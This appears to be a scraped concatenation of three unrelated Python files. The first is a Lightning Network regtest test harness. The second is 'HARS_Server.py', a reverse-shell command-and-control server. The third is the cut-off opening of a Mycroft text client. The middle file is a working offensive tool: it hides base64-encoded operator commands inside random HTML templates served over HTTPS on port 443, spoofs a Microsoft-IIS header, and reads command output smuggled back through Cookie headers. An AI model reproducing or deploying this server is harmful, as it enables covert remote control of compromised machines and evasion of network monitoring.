logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
        starting from the last of the previously waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
    throwaway connections. This is easier than reaching into the RPC
    library to close, reopen and re-authenticate upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
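# Attribute access builds a one-shot RPC call, e.g.
# SimpleBitcoinProxy(btc_conf_file=path).getblockchaininfo() opens a fresh
# connection just for that call and then discards it.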
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
btc_conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(btc_conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
return proxy
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': 'regtest',
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.rpcproxy.start()
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['address']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
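        # (the feerates given here are interpreted per kilo-weight: 1 kvbyte =
        # 4 kweight, hence the * 4; dividing by 10**8 converts satoshi to BTC)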
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(self.get_node, options=cli_opts, **node_opts))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None):
with self.lock:
node_id = self.next_id
self.next_id += 1
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
        # Regtest estimatefee is unusable, so override it.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
        # If we're returning now, make sure all dst nodes show the
        # connection in getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['address']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail
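# Illustrative usage of NodeFactory (a sketch, not part of the test suite; it
# assumes a running regtest bitcoind, a concurrent.futures executor and a
# scratch directory supplied by the surrounding test harness):
#
#   factory = NodeFactory("example", bitcoind, executor, "/tmp/ltests")
#   l1, l2 = factory.line_graph(2, fundchannel=True, wait_for_announce=True)
#   ...  # drive l1/l2 through their rpc handles
#   factory.killall([True, True])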
|
HARS_Server.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# HTTP ASYNCHRONE REVERSE SHELL
# Version : 0.1 POC
# Git : https://github.com/onSec-fr
import BaseHTTPServer, SimpleHTTPServer
import ssl
import os
import base64
import threading
import sys
import random
# Config
PORT = 443
CERT_FILE = '../server.pem'
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# Custom headers
def _set_headers(self):
self.send_header("Cache-Control", "private, max-age=0")
self.send_header("Content-Type", "text/html; charset=utf-8")
self.send_header("Vary", "Accept-Encoding")
self.send_header("Connection", "close")
self.end_headers()
# GET events
def do_GET(self):
if self.path.startswith("/search"):
if initConn == False:
                # If the client says hello, then reply hello (first connection)
if base64.b64decode(self.headers['Cookie']) == "HELLO":
print(Colors.GREEN + '[!] Connection established with ' + self.client_address[0] + "\n" + Colors.END)
InitConn()
self.send_response(200)
self._set_headers()
cmd = 'HELLO'
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
outfile = file.read() + encodedCmd
self.wfile.write(outfile)
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Client ask for instructions
elif base64.b64decode(self.headers['Cookie']) == "ASK":
with open('search', 'r') as file:
outfile = file.read()
self.send_response(200)
self._set_headers()
self.wfile.write(outfile)
if (wait == False):
InitFile()
# Client reply with output
else:
resp = base64.b64decode(self.headers['Cookie'])
if resp == "EXIT OK":
stop_server()
else:
print(Colors.LIGHT_WHITE + "\n" + resp + Colors.END)
InitFile()
self.send_response(200)
self._set_headers()
with open('search', 'r') as file:
outfile = file.read()
self.wfile.write(outfile)
CancelWait()
else:
self.send_response(404)
self._set_headers()
self.wfile.write("Not found")
# Save logs
log_file = open('../logs/logs.txt', 'w', True)
def log_message(self, format, *args):
self.log_file.write("%s - - [%s] %s\n" %(self.client_address[0],self.log_date_time_string(),format%args))
def InitConn():
global initConn
initConn = True
def CancelWait():
global wait
wait = False
# Choose random template file
def InitFile():
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read()
outfile = open("search", "w")
outfile.write(template)
outfile.close()
class Colors:
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
CYAN = "\033[0;36m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
END = "\033[0m"
if not __import__("sys").stdout.isatty():
for _ in dir():
if isinstance(_, str) and _[0] != "_":
locals()[_] = ""
else:
if __import__("platform").system() == "Windows":
kernel32 = __import__("ctypes").windll.kernel32
kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
del kernel32
# Start http server
def start_server():
global httpd
print(Colors.BLUE + '[!] Server listening on port ' + str(PORT) + ', waiting connection from client...' + Colors.END)
server_class = BaseHTTPServer.HTTPServer
MyHandler.server_version = "Microsoft-IIS/8.5"
MyHandler.sys_version = ""
httpd = server_class(('0.0.0.0', PORT), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile=CERT_FILE, server_side=True)
httpd.serve_forever()
# Exit
def stop_server():
print(Colors.YELLOW + '[!] Exit' + Colors.END)
os.remove("search")
os._exit(1)
if __name__ == '__main__':
# Init
initConn = False
wait = True
InitFile()
try:
# Start http server in separate thread
daemon = threading.Thread(target=start_server)
daemon.daemon = True
daemon.start()
# Wait for first connection from client
while (initConn == False):
pass
while True:
cmd = raw_input("Command> ")
wait = True
print(Colors.BLUE + 'Awaiting response ...' + Colors.END)
encodedCmd = str(base64.b64encode(cmd.encode("utf-8")))
rndtemplate = random.choice([x for x in os.listdir("../templates") if os.path.isfile(os.path.join("../templates", x))])
with open("../templates/" + rndtemplate, 'r') as file:
template = file.read() + encodedCmd
outfile = open("search", "w")
outfile.write(template)
outfile.close()
# Wait for client's reply
while (wait == True):
pass
except KeyboardInterrupt:
stop_server()
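# Protocol sketch, derived from do_GET above (illustrative only): the client
# polls /search with a base64-encoded value in the Cookie header, and the
# server replies with a random HTML template whose tail carries the
# base64-encoded command to run. The initial handshake therefore looks
# roughly like:
#
#   GET /search HTTP/1.1
#   Cookie: SEVMTE8=            <- base64("HELLO")
#
# followed by Cookie: QVNL ("ASK") to poll for commands, and a Cookie carrying
# the base64-encoded command output on the next request.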
|
text_client.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import io
from math import ceil
from .gui_server import start_qml_gui
from mycroft.tts import TTS
import os
import os.path
import time
import curses
import textwrap
import json
import mycroft.version
from threading import Thread, Lock
from mycroft.messagebus.client import MessageBusClient
from mycroft.messagebus.message import Message
from mycroft.util.log import LOG
from mycroft.configuration import Configuration
import locale
# Curses uses LC_ALL to determine how to display chars; set it to the
# system default
locale.setlocale(locale.LC_ALL, "") # Set LC_ALL to user default
preferred_encoding = locale.getpreferredencoding()
bSimple = False
bus = None # Mycroft messagebus connection
config = {} # Will be populated by the Mycroft configuration
event_thread = None
history = []
chat = [] # chat history, oldest at the lowest index
line = ""
scr = None
log_line_offset = 0 # num lines back in logs to show
log_line_lr_scroll = 0 # amount to scroll left/right for long lines
longest_visible_line = 0 # for HOME key
auto_scroll = True
# for debugging odd terminals
last_key = ""
show_last_key = False
show_gui = None # None = not initialized, else True/False
gui_text = []
log_lock = Lock()
max_log_lines = 5000
mergedLog = []
filteredLog = []
default_log_filters = ["mouth.viseme", "mouth.display", "mouth.icon"]
log_filters = list(default_log_filters)
log_files = []
find_str = None
cy_chat_area = 7 # default chat history height (in lines)
size_log_area = 0 # max number of visible log lines, calculated during draw
# Values used to display the audio meter
show_meter = True
meter_peak = 20
meter_cur = -1
meter_thresh = -1
SCR_MAIN = 0
SCR_HELP = 1
SCR_SKILLS = 2
screen_mode = SCR_MAIN
subscreen = 0 # for help pages, etc.
FULL_REDRAW_FREQUENCY = 10 # seconds between full redraws
last_full_redraw = time.time()-(FULL_REDRAW_FREQUENCY-1) # seed for 1s redraw
screen_lock = Lock()
is_screen_dirty = True
# Curses color codes (reassigned at runtime)
CLR_HEADING = 0
CLR_FIND = 0
CLR_CHAT_RESP = 0
CLR_CHAT_QUERY = 0
CLR_CMDLINE = 0
CLR_INPUT = 0
CLR_LOG1 = 0
CLR_LOG2 = 0
CLR_LOG_DEBUG = 0
CLR_LOG_ERROR = 0
CLR_LOG_CMDMESSAGE = 0
CLR_METER_CUR = 0
CLR_METER = 0
# Allow Ctrl+C catching...
ctrl_c_was_pressed = False
def ctrl_c_handler(signum, frame):
global ctrl_c_was_pressed
ctrl_c_was_pressed = True
def ctrl_c_pressed():
global ctrl_c_was_pressed
if ctrl_c_was_pressed:
ctrl_c_was_pressed = False
return True
else:
return False
##############################################################################
# Helper functions
def clamp(n, smallest, largest):
""" Force n to be between smallest and largest, inclusive """
return max(smallest, min(n, largest))
def handleNonAscii(text):
"""
        If the default locale supports UTF-8, re-encode the string; otherwise
        remove the offending characters.
"""
if preferred_encoding == 'ASCII':
return ''.join([i if ord(i) < 128 else ' ' for i in text])
else:
return text.encode(preferred_encoding)
##############################################################################
# Settings
config_file = os.path.join(os.path.expanduser("~"), ".mycroft_cli.conf")
def load_mycroft_config(bus):
""" Load the mycroft config and connect it to updates over the messagebus.
"""
Configuration.set_config_update_handlers(bus)
